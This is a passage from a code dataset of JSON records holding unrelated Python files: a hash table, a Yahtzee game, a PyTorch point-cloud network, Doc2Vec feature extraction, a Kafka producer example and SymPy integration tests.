str(self.__buckets[i])\r\n        return result\r\n\r\n    def hashValue(self, value):\r\n        \"\"\"\r\n        Calculates the hash value\r\n        param: value to calculate location\r\n        return: location to place value in hash table\r\n        \"\"\"\r\n        if value is None:\r\n            return None\r\n        else:\r\n            return value.getId() % self.__size\r\n\r\n    def put(self, value):\r\n        \"\"\"\r\n        Inserts value into hash table\r\n        param: value to be inserted into the table\r\n        return: None if no value provided\r\n        \"\"\"\r\n        slot = self.hashValue(value)\r\n        if value is None:\r\n            return None\r\n        # Assigns value to the bucket\r\n        else:\r\n            self.__buckets[slot].insert(value)\r\n\r\n    def retrieve(self, value):\r\n        slot = self.hashValue(value)\r\n        if value is None:\r\n            return None\r\n        # Searches for value in hash table\r\n        else:\r\n            return self.__buckets[slot].retrieve(value)\r\n\r\n    def __len__(self):\r\n        return self.__size\r\n","repo_name":"graylecompte/dataStructures","sub_path":"HashBST.py","file_name":"HashBST.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35846710607","text":"import random, datetime\nfrom score.card import ScoreCard\nfrom player import Player\n\nclass YahtzeeGame:\n    \"\"\"\n    A game where each player rolls dice a max number of times in a turn and \n    can choose what dice to keep or throw. The player determines their score \n    after ending their turn.
 When the game ends, the player with the \n    highest score wins.\n    \"\"\"\n\n    # Constructor\n    def __init__(self):\n        # Declare constants\n        self.MAX_ROLLS = 3\n        self.DICE_VALUES = [1, 2, 3, 4, 5, 6]\n        self.MAX_DICE_COUNT = 5\n\n        # Declare variables\n        self.isGameOver = False\n        self.rolledDice = []\n        self.rollCounter = 0\n        self.endOfTurn = False\n        self.diceCount = self.MAX_DICE_COUNT\n        self.playersDice = []\n        self.players = []\n        self.curPlayerIndex = 0\n        self.hasRecordedScore = False\n\n    def rollDice(self):\n        if self.rollCounter < self.MAX_ROLLS:\n            diceCount = len(self.rolledDice) if len(self.playersDice) != 0 else self.MAX_DICE_COUNT\n            random.seed(datetime.datetime.now()) # more randomness?\n            self.rolledDice = random.choices(self.DICE_VALUES, k=diceCount)\n            self.rollCounter += 1\n            return True\n        return False\n\n    def keepDiceValues(self, values):\n        \"\"\"Transfers dice from the rolled dice to the player's dice\"\"\"\n        self.keepThrow(values, self.playersDice, self.rolledDice)\n\n    def throwDiceValues(self, values):\n        \"\"\"Transfers dice from the player's dice to the rolled dice\"\"\"\n        self.keepThrow(values, self.rolledDice, self.playersDice)\n\n    def keepThrow(self, values, addToList, subFromList):\n        # values should be a list of integers\n        for v in values:\n            # check if the value is in the subFromList\n            if v in subFromList:\n                subFromList.remove(v)\n                addToList.append(v)\n    \n    def recordScore(self, catagory):\n        \"\"\"Attempts to record the player's score in the given category and \n        returns whether or not the score was recorded. This also \n        effectively ends the player's turn.\"\"\"\n\n        # Ensure that the player cannot record their score multiple times\n        if self.hasRecordedScore:\n            print(\"You have already recorded your score for this turn.\")\n            return False\n\n        allDice = self.playersDice + self.rolledDice\n        # TODO if the score that's about to be recorded is zero, ask the user\n        # if they still want to proceed\n        \n        self.hasRecordedScore = self.currentPlayer().recordScore(catagory, allDice)\n        return self.hasRecordedScore\n    \n    def addPlayer(self, name):\n        # check if the player name is already in the list\n        for p in self.players:\n            if p.name == name:\n                return False\n        # add player to list\n        self.players.append(Player(name))\n        return True\n    \n    def removePlayer(self, name):\n        # check if the player name is in the list\n        foundPlayer = None\n        for p in self.players:\n            if p.name == name:\n                foundPlayer = p\n                break\n        # remove the player from the list\n        if foundPlayer:\n            self.players.remove(foundPlayer)\n            return True\n        return False\n\n    def removeAllPlayers(self):\n        self.players.clear()\n\n    def nextPlayer(self):\n        self.curPlayerIndex += 1\n        if self.curPlayerIndex >= len(self.players):\n            self.curPlayerIndex = 0\n        # Reset variables\n        self.rollCounter = 0\n        self.diceCount = self.MAX_DICE_COUNT\n        self.hasRecordedScore = False\n        self.playersDice.clear()\n\n        if self.currentPlayer().isComplete():\n            self.isGameOver = True\n    \n    def currentPlayer(self):\n        return self.players[self.curPlayerIndex]\n\n    def getRankings(self):\n        listCopy = list(self.players)\n        listCopy.sort(key=lambda p: p.scoreCard.getTotalScore(), reverse=True)\n\n        rStr = \"\"\n        for i in range(len(listCopy)):\n            cur = listCopy[i]\n            rStr += f'{i+1}\\t{cur.name}\\t{cur.scoreCard.getTotalScore()}\\n'\n        return rStr\n\n    def giveDice(self, values):\n        # prevent further rolls after a give command\n        self.diceCount = 0\n        self.rollCounter = self.MAX_ROLLS\n        self.rolledDice.clear()\n        self.playersDice = values\n\n    def getHelp(self):\n        return \"\"\"\nroll: Rolls the remaining dice
\n\nkeep: Keep the specified dice based on the dice's value\n\nthrow: Throws dice the player has back into the active dice to be rolled\n\nrecord: Scores the dice you have based on how you tell it to score. For example,\n        typing 'record aces' will score into the aces category. Once a score is \n        recorded for a category, you cannot change that score.\n\nscores: Shows you all the scores you have recorded.\n\nend turn: Ends your turn\n\nhelp: Shows commands and descriptions\n\nexit: Exits the game\"\"\"\n","repo_name":"Jesse-Richman/YahtzeeGame","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3517400137","text":"import os\nimport sys\nimport copy\nimport math\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom OP import pointnet2_utils\n\n\ndef knn(x, k):\n    '''\n    get k nearest neighbors' indices for a single point cloud feature\n    :param x: x is point cloud feature, shape: [B, F, N]\n    :param k: k is the number of neighbors\n    :return: KNN graph, shape: [B, N, k]\n    ''' \n    inner = -2*torch.matmul(x.transpose(2, 1), x)\n    xx = torch.sum(x**2, dim=1, keepdim=True)\n    pairwise_distance = -xx - inner - xx.transpose(2, 1)\n    \n    idx = pairwise_distance.topk(k=k, dim=-1)[1]   # (batch_size, num_points, k)\n    return idx\n\ndef eigen_function(X):\n    '''\n    get eigen and eigenVector for a single point cloud neighbor feature\n    :param X: X is a Tensor, shape: [B, N, K, F]\n    :return eigen: shape: [B, N, F]\n    '''\n    B, N, K, F = X.shape\n    # X_tranpose [N,F,K] \n    X_tranpose = X.permute(0, 1, 3, 2)\n    # high_dim_matrix [N, F, F]\n    high_dim_matrix = torch.matmul(X_tranpose, X)\n\n    high_dim_matrix = high_dim_matrix.cpu().detach().numpy()\n    eigen, eigen_vec = np.linalg.eig(high_dim_matrix)\n    eigen_vec = torch.Tensor(eigen_vec).cuda()\n    eigen = torch.Tensor(eigen).cuda()\n\n    return eigen, eigen_vec\n\n\ndef eigen_Graph(x, k=20):\n    '''\n    get eigen Graph for point cloud\n    :param X: x is a Tensor, shape: [B, F, N]\n    :param k: the number of neighbors\n    :return feature: shape: [B, F, N]\n    :return idx_EuclideanSpace: k nearest neighbors of Euclidean Space, shape[B, N, k]\n    :return idx_EigenSpace: k nearest neighbors of Eigenvalue Space, shape[B, N, k]\n    ''' \n    batch_size = x.size(0)\n    num_dims = x.size(1)\n    num_points = x.size(2)\n    device = torch.device('cuda')\n    x = x.view(batch_size, -1, num_points)\n\n    # idx [batch_size, num_points, k]\n    idx_EuclideanSpace = knn(x, k=k) \n    idx_EuclideanSpace = idx_EuclideanSpace + torch.arange(0, batch_size, device=device).view(-1, 1, 1)*num_points\n    idx_EuclideanSpace = idx_EuclideanSpace.view(-1)\n    \n\n    x = x.transpose(2, 1).contiguous()# (batch_size, num_points, num_dims)  -> (batch_size*num_points, num_dims) #   batch_size * num_points * k + range(0, batch_size*num_points)\n    feature = x.view(batch_size*num_points, -1)[idx_EuclideanSpace, :]\n    feature = feature.view(batch_size, num_points, k, num_dims) \n    \n    eigen,eigen_vec = eigen_function(feature-x.view(batch_size, num_points, 1, num_dims).repeat(1, 1, k, 1))\n    eigen_vec = eigen_vec.reshape([batch_size, num_points, -1])\n\n    feature = torch.cat(( x, eigen, eigen_vec), dim=2)\n\n    idx_EigenSpace = knn(eigen.permute(0,2,1), k=k) # (batch_size, num_points, k)\n    idx_EigenSpace = idx_EigenSpace + torch.arange(0, batch_size, device=device).view(-1, 1, 1)*num_points\n    idx_EigenSpace = idx_EigenSpace.view(-1)\n\n    return feature.permute(0,2,1), idx_EuclideanSpace, idx_EigenSpace
\n\n\ndef first_GroupLayer(x, idx_EU, idx_EI, k=20):\n    '''\n    group Features for point cloud (First Layer)\n    :param x: x is a Tensor, shape: [B, F, N]\n    :param idx_EU: k nearest neighbors of Euclidean Space, shape[B, N, k]\n    :param idx_EI: k nearest neighbors of Eigenvalue Space, shape[B, N, k]\n    :param k: the number of neighbors\n    :return output feature: shape: [B, F, N, k]\n    ''' \n    batch_size = x.size(0)\n    num_points = x.size(2)\n    x = x.view(batch_size, -1, num_points)\n\n    org_xyz = x[:,0:3,:] # coordinate\n    org_feats = x[:,3:6,:] #eigenValue\n\n    org_xyz = org_xyz.transpose(2, 1).contiguous()\n    xyz = org_xyz.view(batch_size*num_points, -1)[idx_EU, :]\n    xyz = xyz.view(batch_size, num_points, k, 3)\n    org_xyz = org_xyz.view(batch_size, num_points, 1, 3).repeat(1, 1, k, 1) \n\n    grouped_xyz = torch.cat((xyz - org_xyz, xyz), dim = 3)\n\n    org_feats = org_feats.transpose(2, 1).contiguous()\n    feats = org_feats.view(batch_size*num_points, -1)[idx_EI, :]\n    feats = feats.view(batch_size, num_points, k, 3)\n    org_feats = org_feats.view(batch_size, num_points, 1, 3).repeat(1, 1, k, 1) \n\n    # feat2 = feats -org_feats\n    grouped_feats = torch.cat((feats - org_feats, feats), dim = 3)\n\n    output = torch.cat((grouped_xyz, grouped_feats), dim = 3).permute(0, 3, 1, 2)\n    return output\n\n\n\ndef GroupLayer(x, k=20, idx=None):\n    '''\n    group Features for point cloud\n    :param x: x is a Tensor, shape: [B, F, N]\n    :param idx: k nearest neighbors , shape[B, N, k]\n    :param k: the number of neighbors\n    :return output feature: shape: [B, F, N, k]\n    ''' \n    batch_size = x.size(0)\n    num_points = x.size(2)\n    x = x.view(batch_size, -1, num_points)\n\n    \n    _, num_dims, _ = x.size()\n\n    x = x.transpose(2, 1).contiguous()   # (batch_size, num_points, num_dims)  -> (batch_size*num_points, num_dims) #   batch_size * num_points * k + range(0, batch_size*num_points)\n    feature = x.view(batch_size*num_points, -1)[idx, :]\n    feature = feature.view(batch_size, num_points, k, num_dims) \n    x = x.view(batch_size, num_points, 1, num_dims).repeat(1, 1, k, 1)\n    \n    feature = torch.cat((feature-x, feature), dim=3).permute(0, 3, 1, 2)\n    \n    return feature\n\ndef get_graph_distance(x, k=20, idx=None):\n    '''\n    get Graph Distance for point cloud\n    :param x: x is a Tensor, shape: [B, F, N]\n    :param idx: k nearest neighbors , shape[B, N, k]\n    :param k: the number of neighbors\n    :return output feature: shape: [B, F, N, k]\n    ''' \n    batch_size = x.size(0)\n    num_points = x.size(2)\n    x = x.view(batch_size, -1, num_points)\n    device = torch.device('cuda')\n    _, num_dims, _ = x.size()\n\n\n    x = x.transpose(2, 1).contiguous()   # (batch_size, num_points, num_dims)  -> (batch_size*num_points, num_dims) #   batch_size * num_points * k + range(0, batch_size*num_points)\n    knn_points = x.view(batch_size*num_points, -1)[idx, :]#[B,N,K,3]\n    knn_points = knn_points.view(batch_size, num_points, k, num_dims) \n\n    x = x.view(batch_size, num_points, 1, num_dims).repeat(1, 1, k, 1)\n    distance = knn_points-x #[B,N,K,3]\n    distance = torch.sqrt(torch.sum(distance * distance, dim = -1))# [B,N,K]\n\n    return distance.reshape((batch_size,1,num_points,k))\n\n\n\n\nclass GSNET(nn.Module):\n    def __init__(self, args, output_channels=40):\n        super(GSNET, self).__init__()\n        self.args = args\n        self.k = args.k\n        \n        self.bn1 = nn.BatchNorm2d(64)\n        self.bn2 = nn.BatchNorm2d(64)\n        self.bn3 = nn.BatchNorm2d(128)\n        # self.bn4 = nn.BatchNorm2d(256)\n        self.bn5 = nn.BatchNorm1d(args.emb_dims)\n\n        self.conv1 = nn.Sequential(nn.Conv2d(13, 64, kernel_size=1, bias=False),\n                                   self.bn1,\n                                   
nn.LeakyReLU(negative_slope=0.2))\n self.conv2 = nn.Sequential(nn.Conv2d(64*4, 64, kernel_size=1, bias=False),\n self.bn2,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv3 = nn.Sequential(nn.Conv2d(64*4, 128, kernel_size=1, bias=False),\n self.bn3,\n nn.LeakyReLU(negative_slope=0.2))\n self.conv5 = nn.Sequential(nn.Conv1d(256, args.emb_dims, kernel_size=1, bias=False),\n self.bn5,\n nn.LeakyReLU(negative_slope=0.2))\n self.linear1 = nn.Linear(args.emb_dims*2, 512, bias=False)\n self.bn6 = nn.BatchNorm1d(512)\n self.dp1 = nn.Dropout(p=args.dropout)\n self.linear2 = nn.Linear(512, 256)\n self.bn7 = nn.BatchNorm1d(256)\n self.dp2 = nn.Dropout(p=args.dropout)\n self.linear3 = nn.Linear(256, output_channels)\n\n\n\n def GSCM(self, points, feats, k, conv, isFirstLayer=False):\n '''\n Geometry Similarity Connection Module\n :param points: points' coordinates, shape: [B, N, 3]\n :param feats: points' feature, shape: [B, N, F]\n :param k: the number of neighbors\n :param conv: convolution layers\n :return output feature: shape: [B, F, N]\n ''' \n if isFirstLayer:\n x, idx_EU, idx_EI = eigen_Graph(points.permute(0,2,1).contiguous(), k=k)\n x = first_GroupLayer(x, idx_EU, idx_EI,k=k)\n distance = get_graph_distance(points.permute(0,2,1).contiguous(),k=k, idx = idx_EU)\n x = torch.cat((x, distance),dim = 1) \n else:\n _, idx_EU, idx_EI = eigen_Graph(points.permute(0,2,1).contiguous(), k=k)\n x_knn_EU = GroupLayer(feats, k=k, idx=idx_EU)\n x_knn_EI = GroupLayer(feats, k=k, idx=idx_EI)\n x = torch.cat((x_knn_EU,x_knn_EI),dim = 1)\n x = conv(x) \n x = x.max(dim=-1, keepdim=False)[0]\n return x\n\n\n def forward(self, x):\n batch_size = x.size(0)\n num_points_1 = x.size(2)\n num_points_2 = int(num_points_1/2)\n num_points_3 = int(num_points_1/4)\n\n ########################BLOCK1##############################\n N1_points = x.permute(0,2,1).contiguous()\n x1 = self.GSCM( N1_points, None, self.k, self.conv1, isFirstLayer=True)\n\n ########################BLOCK2##############################\n fps_id_2 = pointnet2_utils.furthest_point_sample(N1_points, num_points_2)\n N2_points = (\n pointnet2_utils.gather_operation(\n N1_points.transpose(1, 2).contiguous(), fps_id_2\n ).transpose(1, 2).contiguous())\n x1_downSample = (\n pointnet2_utils.gather_operation(\n x1, fps_id_2)\n )\n x2 = self.GSCM( N2_points, x1_downSample, self.k, self.conv2)\n\n ########################BLOCK3##############################\n fps_id_3 = pointnet2_utils.furthest_point_sample(N2_points, num_points_3)\n N3_points = (\n pointnet2_utils.gather_operation(\n N2_points.transpose(1, 2).contiguous(), fps_id_3\n ).transpose(1, 2).contiguous())\n x2_downSample = (\n pointnet2_utils.gather_operation(\n x2, fps_id_3)\n )\n x1_downSample = (\n pointnet2_utils.gather_operation(\n x1_downSample, fps_id_3)\n ) \n x3 = self.GSCM( N3_points, x2_downSample, self.k, self.conv3)\n\n\n x = torch.cat((x1_downSample, x2_downSample, x3), dim=1)\n\n x = self.conv5(x)\n x1 = F.adaptive_max_pool1d(x, 1).view(batch_size, -1)\n x2 = F.adaptive_avg_pool1d(x, 1).view(batch_size, -1)\n x = torch.cat((x1, x2), 1)\n\n x = F.leaky_relu(self.bn6(self.linear1(x)), negative_slope=0.2)\n x = self.dp1(x)\n x = F.leaky_relu(self.bn7(self.linear2(x)), negative_slope=0.2)\n x = self.dp2(x)\n x = self.linear3(x)\n return x\n","repo_name":"MingyeXu/GS-Net","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10758,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"75"} 
+{"seq_id":"31091425518","text":"import random\nimport multiprocessing\nimport gensim.models.doc2vec\nfrom collections import OrderedDict\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import stopwords\n\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nfrom datetime import datetime\nfrom sherlock.global_state import is_first\n\nassert gensim.models.word2vec_inner.FAST_VERSION > -1, \"This will be painfully slow otherwise\"\n\n\ndef tokenise(values):\n joined = \" \".join(s for s in values if len(s) >= 2)\n\n # stopwords need apostrophe\n filtered = \"\".join(\n e for e in joined if e.isalnum() or e.isspace() or e == \"'\"\n ).lower()\n\n return [\n word\n for word in nltk.word_tokenize(filtered)\n if len(word) >= 2 and word not in STOPWORDS_ENGLISH\n ]\n\n\n# Input: a collection of columns stored in a dataframe column 'values'\n# Output: tagged columns.\n# Only needed for training.\ndef tagcol_paragraph_embeddings_features(train_data: pd.Series, train_labels: list):\n random.seed(13)\n\n columns = []\n\n for i, col in enumerate(train_data):\n label = train_labels[i]\n values = random.sample(col, min(1000, len(col)))\n\n if len(values) > 0:\n values = list(map(lambda s: \"\" if s is None else str(s), values))\n\n tokens = tokenise(values)\n\n columns.append(TaggedDocument(tokens, label))\n\n return columns\n\n\n# Input: returned tagged document collection from tagcol_paragraph_embeddings_features\n# Output: a stored retrained model\n# Only needed for training.\ndef train_paragraph_embeddings_features(columns, dim):\n # Train Doc2Vec model\n train_model = Doc2Vec(\n columns,\n dm=0,\n negative=3,\n workers=multiprocessing.cpu_count(),\n vector_size=dim,\n epochs=20,\n min_count=2,\n seed=13,\n )\n\n # Save trained model\n model_file = f\"../sherlock/features/par_vec_trained_{dim}.pkl\"\n\n train_model.save(model_file)\n train_model.delete_temporary_training_data(\n keep_doctags_vectors=True, keep_inference=True\n )\n\n\nDIM = 400\nmodel: Doc2Vec\n\n\ndef initialise_pretrained_model(dim):\n start = datetime.now()\n global model\n\n filename = f\"../sherlock/features/par_vec_trained_{dim}.pkl\"\n\n assert dim == DIM\n\n model = Doc2Vec.load(filename)\n model.delete_temporary_training_data(keep_doctags_vectors=True, keep_inference=True)\n print(\n f\"Initialise Doc2Vec Model, {dim} dim, process took {datetime.now() - start} seconds. (filename = {filename})\"\n )\n\n\nSTOPWORDS_ENGLISH = None\n\n\ndef initialise_nltk():\n start = datetime.now()\n\n nltk.download(\"punkt\")\n nltk.download(\"stopwords\")\n\n global STOPWORDS_ENGLISH\n\n STOPWORDS_ENGLISH = stopwords.words(\"english\")\n\n print(f\"Initialised NLTK, process took {datetime.now() - start} seconds.\")\n\n\n# Input: a single column in the form of a pandas Series.\n# Output: ordered dictionary holding paragraph vector features\ndef infer_paragraph_embeddings_features(\n col_values: list, features: OrderedDict, dim, reuse_model\n):\n if not reuse_model or model is None:\n # Load pretrained paragraph vector model\n initialise_pretrained_model(dim)\n\n # Resetting the random seed before inference keeps the inference vectors deterministic. Gensim uses random values\n # in the inference process, so setting the seed just beforehand makes the inference repeatable.\n # https://github.com/RaRe-Technologies/gensim/issues/447\n\n # To make the inference repeatable across runtime launches, we also need to set PYTHONHASHSEED\n # prior to launching the execution environment (i.e. jupyter notebook). E.g. 
export PYTHONHASHSEED=13\n # See above Github thread for more information.\n model.random.seed(13)\n\n tokens = tokenise(col_values)\n\n # Infer paragraph vector for data sample.\n inferred = model.infer_vector(tokens, steps=20, alpha=0.025)\n\n if is_first():\n # the first output needs fully expanded keys (to drive CSV header)\n for idx, value in enumerate(inferred):\n features[\"par_vec_\" + str(idx)] = value\n else:\n # subsequent lines only care about values, so we can pre-render a block of CSV. This\n # cuts overhead of storing granular values in the features dictionary\n features[\"par_vec-pre-rendered\"] = \",\".join(map(lambda x: \"%g\" % x, inferred))\n","repo_name":"mitmedialab/sherlock-project","sub_path":"sherlock/features/paragraph_vectors.py","file_name":"paragraph_vectors.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"75"} +{"seq_id":"72617508721","text":"# from confluent_kafka import Producer\n#\n# p = Producer({'bootstrap.servers': 'localhost:9092'})\n# p.produce('mytopic2', key='hello', value='world')\n# p.flush(30)\n\n\nfrom confluent_kafka import Producer\nimport random\nimport argparse\n\n\ndef acked(err, msg):\n if err is not None:\n print(\"Failed to deliver message: {0}: {1}\"\n .format(msg.value(), err.str()))\n else:\n print(\"Message produced: {0}\".format(msg.value()))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"ip\", help=\"IP address\")\nparser.add_argument(\"port\", help=\"Port no.\")\nargs = parser.parse_args()\n\naddress = \"\" + args.ip + \":\" + args.port\np = Producer({'bootstrap.servers': address})\n\ntry:\n for val in xrange(1, 10000):\n p.produce('mytopic', 'myvalue #{0}'\n .format(random.choice('abcdefghijklmnopqrstuvwxyz')), callback=acked)\n\n\nexcept KeyboardInterrupt:\n pass\n\np.flush(30)\n\n","repo_name":"gunanksood/kafka-implementation","sub_path":"produce_example.py","file_name":"produce_example.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14570892666","text":"\"\"\"Most of these tests come from the examples in Bronstein's book.\"\"\"\nfrom sympy import Poly, Matrix, S, symbols, I\nfrom sympy.integrals.risch import DifferentialExtension\nfrom sympy.integrals.prde import (prde_normal_denom, prde_special_denom,\n prde_linear_constraints, constant_system, prde_spde, prde_no_cancel_b_large,\n prde_no_cancel_b_small, limited_integrate_reduce, limited_integrate,\n is_deriv_k, is_log_deriv_k_t_radical, parametric_log_deriv_heu,\n is_log_deriv_k_t_radical_in_field)\n\nfrom sympy.abc import x, t, n\n\nt0, t1, t2, t3, k = symbols('t:4 k')\n\n\ndef test_prde_normal_denom():\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1 + t**2, t)]})\n fa = Poly(1, t)\n fd = Poly(x, t)\n G = [(Poly(t, t), Poly(1 + t**2, t)), (Poly(1, t), Poly(x + x*t**2, t))]\n assert prde_normal_denom(fa, fd, G, DE) == \\\n (Poly(x, t), (Poly(1, t), Poly(1, t)), [(Poly(x*t, t),\n Poly(t**2 + 1, t)), (Poly(1, t), Poly(t**2 + 1, t))], Poly(1, t))\n G = [(Poly(t, t), Poly(t**2 + 2*t + 1, t)), (Poly(x*t, t),\n Poly(t**2 + 2*t + 1, t)), (Poly(x*t**2, t), Poly(t**2 + 2*t + 1, t))]\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})\n assert prde_normal_denom(Poly(x, t), Poly(1, t), G, DE) == \\\n (Poly(t + 1, t), (Poly((-1 + x)*t + x, t), Poly(1, t)), [(Poly(t, t),\n Poly(1, t)), (Poly(x*t, t), Poly(1, t)), (Poly(x*t**2, t),\n Poly(1, 
t))], Poly(t + 1, t))\n\n\ndef test_prde_special_denom():\n    a = Poly(t + 1, t)\n    ba = Poly(t**2, t)\n    bd = Poly(1, t)\n    G = [(Poly(t, t), Poly(1, t)), (Poly(t**2, t), Poly(1, t)), (Poly(t**3, t), Poly(1, t))]\n    DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})\n    assert prde_special_denom(a, ba, bd, G, DE) == \\\n        (Poly(t + 1, t), Poly(t**2, t), [(Poly(t, t), Poly(1, t)),\n        (Poly(t**2, t), Poly(1, t)), (Poly(t**3, t), Poly(1, t))], Poly(1, t))\n    G = [(Poly(t, t), Poly(1, t)), (Poly(1, t), Poly(t, t))]\n    assert prde_special_denom(Poly(1, t), Poly(t**2, t), Poly(1, t), G, DE) == \\\n        (Poly(1, t), Poly(t**2 - 1, t), [(Poly(t**2, t), Poly(1, t)),\n        (Poly(1, t), Poly(1, t))], Poly(t, t))\n    DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(-2*x*t0, t0)]})\n    DE.decrement_level()\n    G = [(Poly(t, t), Poly(t**2, t)), (Poly(2*t, t), Poly(t, t))]\n    assert prde_special_denom(Poly(5*x*t + 1, t), Poly(t**2 + 2*x**3*t, t), Poly(t**3 + 2, t), G, DE) == \\\n        (Poly(5*x*t + 1, t), Poly(0, t), [(Poly(t, t), Poly(t**2, t)),\n        (Poly(2*t, t), Poly(t, t))], Poly(1, x))\n    DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly((t**2 + 1)*2*x, t)]})\n    G = [(Poly(t + x, t), Poly(t*x, t)), (Poly(2*t, t), Poly(x**2, x))]\n    assert prde_special_denom(Poly(5*x*t + 1, t), Poly(t**2 + 2*x**3*t, t), Poly(t**3, t), G, DE) == \\\n        (Poly(5*x*t + 1, t), Poly(0, t), [(Poly(t + x, t), Poly(x*t, t)),\n        (Poly(2*t, t, x), Poly(x**2, t, x))], Poly(1, t))\n    assert prde_special_denom(Poly(t + 1, t), Poly(t**2, t), Poly(t**3, t), G, DE) == \\\n        (Poly(t + 1, t), Poly(0, t), [(Poly(t + x, t), Poly(x*t, t)), (Poly(2*t, t, x),\n        Poly(x**2, t, x))], Poly(1, t))\n\n\ndef test_prde_linear_constraints():\n    DE = DifferentialExtension(extension={'D': [Poly(1, x)]})\n    G = [(Poly(2*x**3 + 3*x + 1, x), Poly(x**2 - 1, x)), (Poly(1, x), Poly(x - 1, x)),\n        (Poly(1, x), Poly(x + 1, x))]\n    assert prde_linear_constraints(Poly(1, x), Poly(0, x), G, DE) == \\\n        ((Poly(2*x, x), Poly(0, x), Poly(0, x)), Matrix([[1, 1, -1], [5, 1, 1]]))\n    G = [(Poly(t, t), Poly(1, t)), (Poly(t**2, t), Poly(1, t)), (Poly(t**3, t), Poly(1, t))]\n    DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t, t)]})\n    assert prde_linear_constraints(Poly(t + 1, t), Poly(t**2, t), G, DE) == \\\n        ((Poly(t, t), Poly(t**2, t), Poly(t**3, t)), Matrix())\n    G = [(Poly(2*x, t), Poly(t, t)), (Poly(-x, t), Poly(t, t))]\n    DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})\n    assert prde_linear_constraints(Poly(1, t), Poly(0, t), G, DE) == \\\n        ((Poly(0, t), Poly(0, t)), Matrix([[2*x, -x]]))\n\n\ndef test_constant_system():\n    A = Matrix([[-(x + 3)/(x - 1), (x + 1)/(x - 1), 1],\n                [-x - 3, x + 1, x - 1],\n                [2*(x + 3)/(x - 1), 0, 0]])\n    u = Matrix([(x + 1)/(x - 1), x + 1, 0])\n    DE = DifferentialExtension(extension={'D': [Poly(1, x)]})\n    assert constant_system(A, u, DE) == \\\n        (Matrix([[1, 0, 0],\n                [0, 1, 0],\n                [0, 0, 0],\n                [0, 0, 1]]), Matrix([0, 1, 0, 0]))\n\n\ndef test_prde_spde():\n    D = [Poly(x, t), Poly(-x*t, t)]\n    DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})\n    # TODO: when bound_degree() can handle this, test degree bound from that too\n    assert prde_spde(Poly(t, t), Poly(-1/x, t), D, n, DE) == \\\n        (Poly(t, t), Poly(0, t), [Poly(2*x, t), Poly(-x, t)],\n        [Poly(-x**2, t), Poly(0, t)], n - 1)\n\n\ndef test_prde_no_cancel():\n    # b large\n    DE = DifferentialExtension(extension={'D': [Poly(1, x)]})\n    assert prde_no_cancel_b_large(Poly(1, x), [Poly(x**2, x), Poly(1, x)], 2, DE) == \\\n        ([Poly(x**2 - 2*x + 2, x), Poly(1, x)], 
Matrix([[1, 0, -1, 0],\n [0, 1, 0, -1]]))\n assert prde_no_cancel_b_large(Poly(1, x), [Poly(x**3, x), Poly(1, x)], 3, DE) == \\\n ([Poly(x**3 - 3*x**2 + 6*x - 6, x), Poly(1, x)], Matrix([[1, 0, -1, 0],\n [0, 1, 0, -1]]))\n # b small\n # XXX: Is there a better example of a monomial with D.degree() > 2?\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(t**3 + 1, t)]})\n\n # My original q was t**4 + t + 1, but this solution implies q == t**4\n # (c1 = 4), with some of the ci for the original q equal to 0.\n G = [Poly(t**6, t), Poly(x*t**5, t), Poly(t**3, t), Poly(x*t**2, t), Poly(1 + x, t)]\n assert prde_no_cancel_b_small(Poly(x*t, t), G, 4, DE) == \\\n ([Poly(t**4/4 - x/12*t**3 + x**2/24*t**2 + (-S(11)/12 - x**3/24)*t + x/24, t),\n Poly(x/3*t**3 - x**2/6*t**2 + (-S(1)/3 + x**3/6)*t - x/6, t), Poly(t, t),\n Poly(0, t), Poly(0, t)], Matrix([[1, 0, -1, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, -S(1)/4, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 0, -1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, -1, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, -1, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0, -1, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, -1]]))\n\n # TODO: Add test for deg(b) <= 0 with b small\n\n\ndef test_limited_integrate_reduce():\n DE = DifferentialExtension(extension={'D': [Poly(1, x), Poly(1/x, t)]})\n assert limited_integrate_reduce(Poly(x, t), Poly(t**2, t), [(Poly(x, t),\n Poly(t, t))], DE) == \\\n (Poly(t, t), Poly(-1/x, t), Poly(t, t), 1, (Poly(x, t), Poly(1, t)),\n [(Poly(-x*t, t), Poly(1, t))])\n\n\ndef test_limited_integrate():\n DE = DifferentialExtension(extension={'D': [Poly(1, x)]})\n G = [(Poly(x, x), Poly(x + 1, x))]\n assert limited_integrate(Poly(-(1 + x + 5*x**2 - 3*x**3), x),\n Poly(1 - x - x**2 + x**3, x), G, DE) == \\\n ((Poly(x**2 - x + 2, x), Poly(x - 1, x)), 